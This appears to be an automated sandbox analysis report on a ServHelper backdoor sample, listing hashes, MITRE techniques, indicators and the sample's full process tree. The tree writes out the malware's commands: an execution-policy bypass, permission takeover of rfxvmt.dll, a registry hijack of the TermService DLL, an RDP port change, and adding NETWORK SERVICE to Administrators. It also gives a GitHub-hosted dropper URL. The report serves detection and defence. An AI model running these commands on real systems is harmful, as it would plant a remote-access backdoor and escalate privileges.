servhelper | c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90

Analysis

max time kernel
97s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 14:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe
Size

7.0MB
MD5

f19b9d6b74f65125623613a334baba76
SHA1

8b1428daa9a7d2231663784c2e0457034dbdd468
SHA256

c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90
SHA512

f993b7002c952cc754d86726031052fde8dcdda6ce29b35aca9f8318e390c86b370f2519cb4ec2374e24645772ef6dfbbb4bcf25c49587e4b5d678588c5a3fd4
SSDEEP

196608:9gwCUo86gyVJHh22fiIUrKqJGZdwInqqwgrSPn:9pv6g+JHhu1WVZdwIqqdr

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
49	1836	powershell.exe
51	1836	powershell.exe
53	1836	powershell.exe
55	1836	powershell.exe
59	1836	powershell.exe
61	1836	powershell.exe
63	1836	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

4140 takeown.exe
1160 icacls.exe
4900 icacls.exe
2844 icacls.exe
2640 icacls.exe
4808 icacls.exe
3848 icacls.exe
5000 icacls.exe

pid	process
4140	takeown.exe
1160	icacls.exe
4900	icacls.exe
2844	icacls.exe
2640	icacls.exe
4808	icacls.exe
3848	icacls.exe
5000	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

2068
2068
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

5000 icacls.exe
4140 takeown.exe
1160 icacls.exe
4900 icacls.exe
2844 icacls.exe
2640 icacls.exe
4808 icacls.exe
3848 icacls.exe

pid	process
2068
2068

pid	process
5000	icacls.exe
4140	takeown.exe
1160	icacls.exe
4900	icacls.exe
2844	icacls.exe
2640	icacls.exe
4808	icacls.exe
3848	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

48 raw.githubusercontent.com
49 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
48	raw.githubusercontent.com
49	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI3498.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI34C8.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_3ccv0cwc.kg3.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI34F8.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI3577.tmp	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_3n45cogt.2lq.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI3518.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2160 WMIC.exe

pid	process
2160	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = cb8c48d10b69da01	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1848 reg.exe
Runs net.exe

pid	process
1848	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	51	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	53	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1640	powershell.exe
1640	powershell.exe
780	powershell.exe
780	powershell.exe
4892	powershell.exe
4892	powershell.exe
4892	powershell.exe
2016	powershell.exe
2016	powershell.exe
2016	powershell.exe
1640	powershell.exe
1640	powershell.exe
1640	powershell.exe
1836	powershell.exe
1836	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

648
648

pid	process
648
648

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	780	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeRestorePrivilege	4900	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2160	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2160	WMIC.exe
Token: SeAuditPrivilege	2160	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2160	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2160	WMIC.exe
Token: SeAuditPrivilege	2160	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2020	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2020	WMIC.exe
Token: SeAuditPrivilege	2020	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2020	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2020	WMIC.exe
Token: SeAuditPrivilege	2020	WMIC.exe
Token: SeDebugPrivilege	1836	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 5008 wrote to memory of 1640	5008	c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe	powershell.exe
PID 5008 wrote to memory of 1640	5008	c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe	powershell.exe
PID 1640 wrote to memory of 1956	1640	powershell.exe	csc.exe
PID 1640 wrote to memory of 1956	1640	powershell.exe	csc.exe
PID 1956 wrote to memory of 208	1956	csc.exe	cvtres.exe
PID 1956 wrote to memory of 208	1956	csc.exe	cvtres.exe
PID 1640 wrote to memory of 780	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 780	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 4892	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 4892	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 2016	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 2016	1640	powershell.exe	powershell.exe
PID 1640 wrote to memory of 4140	1640	powershell.exe	takeown.exe
PID 1640 wrote to memory of 4140	1640	powershell.exe	takeown.exe
PID 1640 wrote to memory of 1160	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 1160	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 4900	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 4900	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 2844	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 2844	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 2640	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 2640	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 4808	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 4808	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 3848	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 3848	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 5000	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 5000	1640	powershell.exe	icacls.exe
PID 1640 wrote to memory of 4520	1640	powershell.exe	reg.exe
PID 1640 wrote to memory of 4520	1640	powershell.exe	reg.exe
PID 1640 wrote to memory of 1848	1640	powershell.exe	reg.exe
PID 1640 wrote to memory of 1848	1640	powershell.exe	reg.exe
PID 1640 wrote to memory of 2176	1640	powershell.exe	reg.exe
PID 1640 wrote to memory of 2176	1640	powershell.exe	reg.exe
PID 1640 wrote to memory of 3288	1640	powershell.exe	net.exe
PID 1640 wrote to memory of 3288	1640	powershell.exe	net.exe
PID 3288 wrote to memory of 2480	3288	net.exe	net1.exe
PID 3288 wrote to memory of 2480	3288	net.exe	net1.exe
PID 1640 wrote to memory of 1460	1640	powershell.exe	cmd.exe
PID 1640 wrote to memory of 1460	1640	powershell.exe	cmd.exe
PID 1460 wrote to memory of 4724	1460	cmd.exe	cmd.exe
PID 1460 wrote to memory of 4724	1460	cmd.exe	cmd.exe
PID 4724 wrote to memory of 3584	4724	cmd.exe	net.exe
PID 4724 wrote to memory of 3584	4724	cmd.exe	net.exe
PID 3584 wrote to memory of 3816	3584	net.exe	net1.exe
PID 3584 wrote to memory of 3816	3584	net.exe	net1.exe
PID 1640 wrote to memory of 5108	1640	powershell.exe	cmd.exe
PID 1640 wrote to memory of 5108	1640	powershell.exe	cmd.exe
PID 5108 wrote to memory of 2360	5108	cmd.exe	cmd.exe
PID 5108 wrote to memory of 2360	5108	cmd.exe	cmd.exe
PID 2360 wrote to memory of 3788	2360	cmd.exe	net.exe
PID 2360 wrote to memory of 3788	2360	cmd.exe	net.exe
PID 3788 wrote to memory of 4560	3788	net.exe	net1.exe
PID 3788 wrote to memory of 4560	3788	net.exe	net1.exe
PID 1176 wrote to memory of 4060	1176	cmd.exe	net.exe
PID 1176 wrote to memory of 4060	1176	cmd.exe	net.exe
PID 4060 wrote to memory of 736	4060	net.exe	net1.exe
PID 4060 wrote to memory of 736	4060	net.exe	net1.exe
PID 536 wrote to memory of 632	536	cmd.exe	net.exe
PID 536 wrote to memory of 632	536	cmd.exe	net.exe
PID 632 wrote to memory of 3364	632	net.exe	net1.exe
PID 632 wrote to memory of 3364	632	net.exe	net1.exe
PID 4204 wrote to memory of 780	4204	cmd.exe	net.exe
PID 4204 wrote to memory of 780	4204	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe
"C:\Users\Admin\AppData\Local\Temp\c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bqznyrpa\bqznyrpa.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1956
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80E8.tmp" "c:\Users\Admin\AppData\Local\Temp\bqznyrpa\CSCF0DDA5B187FD41F497F95DE4F633C7.TMP"
      4⤵
      PID:208
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4892
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2016
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4140
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1160
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4900
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2844
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2640
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4808
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3848
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5000
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:4520
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1848
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2176
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2480
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1460
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4724
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3584
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3816
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5108
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2360
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3788
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:4560
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
